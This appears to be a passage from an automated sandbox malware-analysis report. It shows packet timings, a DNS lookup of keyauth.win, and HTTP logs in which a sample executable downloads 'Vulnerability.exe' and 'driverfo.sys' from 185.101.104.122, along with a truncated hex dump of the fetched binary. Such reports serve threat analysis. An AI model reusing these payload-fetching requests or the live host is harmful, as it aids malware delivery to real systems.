                                                                                        Oct 25, 2024 08:10:12.515583038 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.515997887 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516014099 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516067982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516067982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516426086 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516442060 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.516474009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516501904 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.516992092 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517008066 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517024040 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517041922 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517075062 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517076015 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517875910 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517891884 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517908096 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.517930984 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517966986 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.517966986 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518799067 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518815994 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518831968 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518846989 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.518862009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518862009 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518901110 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.518902063 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.519658089 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.519675016 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.519690037 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.519716024 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.519716024 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.519751072 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.520545006 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.520560980 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.520576000 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.520597935 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.520632982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.520632982 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.521387100 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.521403074 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.521441936 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.521473885 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.552803993 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.552839041 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.552874088 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.553044081 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.553045034 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.553045034 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.629981041 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630017996 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630069017 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630222082 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630223036 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630223036 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630425930 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630474091 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630692959 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630692959 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630724907 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630759001 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.630779028 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630804062 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.630986929 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631021023 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631182909 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631182909 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631488085 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631520987 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631556034 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.631572962 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631572962 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.631609917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632230997 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632278919 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632322073 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632323027 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632623911 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632657051 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632687092 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632693052 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.632709980 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.632750988 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.633414984 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.633451939 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.633477926 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.633486032 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.633500099 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.633522987 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.633539915 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.633582115 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.634202003 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.634237051 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.634263992 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.634270906 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.634284973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.634325981 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.634982109 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635018110 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635045052 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.635051966 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635067940 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.635102034 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.635741949 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635776997 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635803938 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.635811090 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635824919 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.635847092 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.635870934 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.635895967 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.636512041 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.636564016 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.636570930 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.636600018 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.636620998 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.636651993 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.637316942 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.637351990 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.637377977 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.637384892 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.637399912 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.637454033 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.638056993 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.638092041 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.638118029 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.638127089 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.638140917 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.638163090 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.638180971 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.638221979 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.638828993 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.638864994 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.638894081 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.638926983 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.672293901 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.677905083 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.842415094 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.842477083 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.842511892 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.842631102 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.842631102 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.842631102 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.842947960 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.842983961 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843018055 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843053102 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843132973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843132973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843132973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843132973 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843821049 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843856096 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843887091 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843889952 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843914986 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843926907 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.843933105 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.843976974 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.844775915 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.844810963 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.844835997 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.844846964 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.844857931 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.844883919 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.844897032 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.844918013 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.844938040 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.844968081 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:12.845674992 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:12.845742941 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:18.720263004 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:18.720437050 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:18.720558882 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:18.720712900 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:18.720725060 CEST8049730185.101.104.122192.168.2.4
                                                                                        Oct 25, 2024 08:10:18.720777988 CEST4973080192.168.2.4185.101.104.122
                                                                                        Oct 25, 2024 08:10:24.386063099 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:24.386126041 CEST44349737104.26.0.5192.168.2.4
                                                                                        Oct 25, 2024 08:10:24.386183023 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:24.394505978 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:24.394545078 CEST44349737104.26.0.5192.168.2.4
                                                                                        Oct 25, 2024 08:10:25.011493921 CEST44349737104.26.0.5192.168.2.4
                                                                                        Oct 25, 2024 08:10:25.011601925 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:25.860654116 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:25.860654116 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:25.860739946 CEST44349737104.26.0.5192.168.2.4
                                                                                        Oct 25, 2024 08:10:25.861030102 CEST44349737104.26.0.5192.168.2.4
                                                                                        Oct 25, 2024 08:10:25.861299992 CEST49737443192.168.2.4104.26.0.5
                                                                                        Oct 25, 2024 08:10:26.564886093 CEST4973080192.168.2.4185.101.104.122

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 25, 2024 08:10:24.369735003 CEST5962853192.168.2.41.1.1.1
                                                                                        Oct 25, 2024 08:10:24.381093979 CEST53596281.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 25, 2024 08:10:24.369735003 CEST192.168.2.41.1.1.10x68e0Standard query (0)keyauth.winA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 25, 2024 08:10:24.381093979 CEST1.1.1.1192.168.2.40x68e0No error (0)keyauth.win104.26.0.5A (IP address)IN (0x0001)false
                                                                                        Oct 25, 2024 08:10:24.381093979 CEST1.1.1.1192.168.2.40x68e0No error (0)keyauth.win104.26.1.5A (IP address)IN (0x0001)false
                                                                                        Oct 25, 2024 08:10:24.381093979 CEST1.1.1.1192.168.2.40x68e0No error (0)keyauth.win172.67.72.57A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • 185.101.104.122

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449730185.101.104.122802256C:\Users\user\Desktop\lUAc7lqa56.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 25, 2024 08:10:11.584738970 CEST311OUTGET /Vulnerability.exe HTTP/1.1
                                                                                        Accept: */*
                                                                                        UA-CPU: AMD64
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: 185.101.104.122
                                                                                        Connection: Keep-Alive
                                                                                        Oct 25, 2024 08:10:12.274135113 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Fri, 25 Oct 2024 06:10:12 GMT
                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                        Last-Modified: Thu, 03 Oct 2024 17:41:18 GMT
                                                                                        ETag: "23800-623960fde9891"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 145408
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-msdownload
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}89k9k9k0k/k?j3k?j=k?jk?j?krj(k9k1kVj>kVck8kVj8kRich9kPEd>f"&NH@p`P@0`p(p@`.textLN `.rdata`R@@.data0@.pdata0@$@@.rsrcP4@@.reloc`6@B
                                                                                        Oct 25, 2024 08:10:12.274187088 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: HL`3H%LT3HY+LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHU
                                                                                        Oct 25, 2024 08:10:12.274224043 CEST1236INData Raw: 00 00 45 8b e6 42 0f b6 4c 08 03 c1 e1 08 8b d0 42 0f b6 44 08 02 0b c8 c1 e1 08 42 0f b6 44 0a 01 0b c8 42 0f b6 04 0a c1 e1 08 0b c8 42 0f b6 44 0a 06 89 4c 24 30 42 0f b6 4c 0a 07 c1 e1 08 0b c8 42 0f b6 44 0a 05 c1 e1 08 0b c8 42 0f b6 44 0a
                                                                                        Data Ascii: EBLBDBDBBDL$0BLBDBDADL$4ALADADADL$8ALADADADL$<ALADADADL$@ALAD
                                                                                        Oct 25, 2024 08:10:12.274604082 CEST1236INData Raw: b6 8c 26 9c c1 01 00 8b d8 44 8b 44 94 30 41 83 c1 04 47 03 84 26 9c c0 01 00 49 83 c6 10 45 03 c2 44 03 c6 41 d3 c0 41 03 c0 41 83 f9 40 0f 82 c9 fd ff ff 8b b4 24 d8 00 00 00 44 03 ef 8b 6c 24 20 03 f0 8b 44 24 24 03 eb 44 8b a4 24 c8 00 00 00
                                                                                        Data Ascii: &DD0AG&IEDAAA@$Dl$ D$$D$@LL$(E$l$ D$D$$A;L$D$I7KH\$xAAD$AAD$AD$AD$AD$AD$AAD$AE,$AA
                                                                                        Oct 25, 2024 08:10:12.274640083 CEST848INData Raw: ff 15 c3 47 01 00 90 e8 7d f3 ff ff 90 e8 97 b5 00 00 cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8d b9 b0 00 00 00 48 8b 01 48 63 50 04 48 8d 05 c9 a4 01 00 48 89 84 3a 50 ff ff ff 48 8b 01 48 63 48 04 8d 91 50 ff ff ff 89 94 39 4c ff
                                                                                        Data Ascii: G}H\$WH HHHcPHH:PHHcHP9LH`HjHHt/HKHCpH9u"LHHHC8HD+HCPD{|tH=HCHh^CHH\$0H _H%CH\$ LD$HT$UVWATAUAVAW
                                                                                        Oct 25, 2024 08:10:12.275073051 CEST1236INData Raw: 00 00 00 c6 45 d0 00 49 8b 56 18 48 83 fa 0f 76 30 48 ff c2 49 8b 0e 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 41 f8 48 2b c8 48 83 c1 f8 48 83 f9 1f 0f 87 f5 19 00 00 48 8b c8 e8 48 1e 01 00 41 c6 06 00 49 c7 46 18 0f 00 00 00 4d 89 6e 10 49
                                                                                        Data Ascii: EIVHv0HIHrH'HAH+HHHHAIFMnIHH3H$HA_A^A]A\_^]3AH+-A$IHuHH-@HXHE33H@WILI
                                                                                        Oct 25, 2024 08:10:12.275108099 CEST1236INData Raw: e8 d8 1a 01 00 4c 8b e0 49 8d 55 04 4c 8b 4c 24 40 eb 03 45 33 e4 4c 89 65 18 48 89 55 28 48 89 5d 30 4d 8b c5 49 8b d1 49 8b cc e8 c9 2a 01 00 43 c7 04 2c 2e 6d 64 35 43 c6 44 2c 04 00 b8 16 00 00 00 89 44 24 38 48 8d 4d b0 48 83 7d c8 0f 48 0f
                                                                                        Data Ascii: LIULL$@E3LeHU(H]0MII*C,.md5CD,D$8HMH}HGMz=L-sL%bHMH}0HGMP=3AHH(H]H}0HG]IHH:6D$8D$0E3E3HH;
                                                                                        Oct 25, 2024 08:10:12.275142908 CEST1236INData Raw: 8d 85 a8 00 00 00 48 89 44 24 78 4d 8d 65 54 49 8d 45 50 85 c9 48 0f 44 c2 8b 08 ff 15 c8 39 01 00 48 8b d8 48 89 44 24 40 48 85 c0 0f 85 e8 01 00 00 8d 48 08 ff 15 9e 35 01 00 0f 57 c0 41 0f 11 07 49 89 5f 10 49 89 5f 18 45 33 c0 48 8d 15 6e 3e
                                                                                        Data Ascii: HD$xMeTIEPHD9HHD$@HH5WAI_I_E3Hn>IHU0Hv1HHMHHrH'HIH+HHAIfoE(EHUHv1HHMHHrH'HIH+HHPEHEH]
                                                                                        Oct 25, 2024 08:10:12.275887966 CEST1236INData Raw: c8 00 00 00 48 8d 8d b0 05 00 00 e8 31 1f 01 00 49 8d 4d 04 41 b8 64 00 00 00 48 8d 95 b0 05 00 00 ff 15 f6 36 01 00 85 c0 0f 84 c0 fd ff ff 0f 57 c0 33 c0 0f 11 85 30 04 00 00 0f 11 85 40 04 00 00 0f 11 85 50 04 00 00 0f 11 85 60 04 00 00 0f 11
                                                                                        Data Ascii: H1IMAdH6W30@P`pHHD$ dLD@dH0HB4TLMD3AH33ff0A<vA<vA<w%LH
                                                                                        Oct 25, 2024 08:10:12.275923014 CEST1236INData Raw: 85 f0 01 00 00 48 63 48 04 8d 91 58 ff ff ff 89 94 0d ec 01 00 00 48 8d 95 a0 00 00 00 48 83 bd b8 00 00 00 0f 48 0f 47 95 a0 00 00 00 4c 8b 85 b0 00 00 00 48 8d 8d f0 01 00 00 e8 e9 9e 00 00 0f 10 45 b0 41 0f 11 07 0f 10 4d c0 41 0f 11 4f 10 4c
                                                                                        Data Ascii: HcHXHHHGLHEAMAOLeHEEHHHv7HHHHrH'HIH+HHv}0LHHUxHv4HHM`HHrH'HIH+
                                                                                        Oct 25, 2024 08:10:12.280404091 CEST1236INData Raw: 59 27 01 00 0f 57 c0 41 0f 11 07 49 89 5f 10 49 89 5f 18 45 33 c0 48 8d 15 29 30 01 00 49 8b cf e8 50 90 00 00 90 48 8b 55 30 48 83 fa 0f 76 34 48 ff c2 48 8b 4d 18 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8
                                                                                        Data Ascii: Y'WAI_I_E3H)0IPHU0Hv4HHMHHrH'HIH+HHv+foyE(EHUHHHMHHH'HIH+HH+&WAMoMoE3Hh/IHt7H+HH
                                                                                        Oct 25, 2024 08:10:12.672293901 CEST306OUTGET /driverfo.sys HTTP/1.1
                                                                                        Accept: */*
                                                                                        UA-CPU: AMD64
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: 185.101.104.122
                                                                                        Connection: Keep-Alive
                                                                                        Oct 25, 2024 08:10:12.842415094 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Fri, 25 Oct 2024 06:10:12 GMT
                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                        Last-Modified: Sat, 19 Oct 2024 00:07:08 GMT
                                                                                        ETag: "4d00-624c93353bec7"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 19712
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
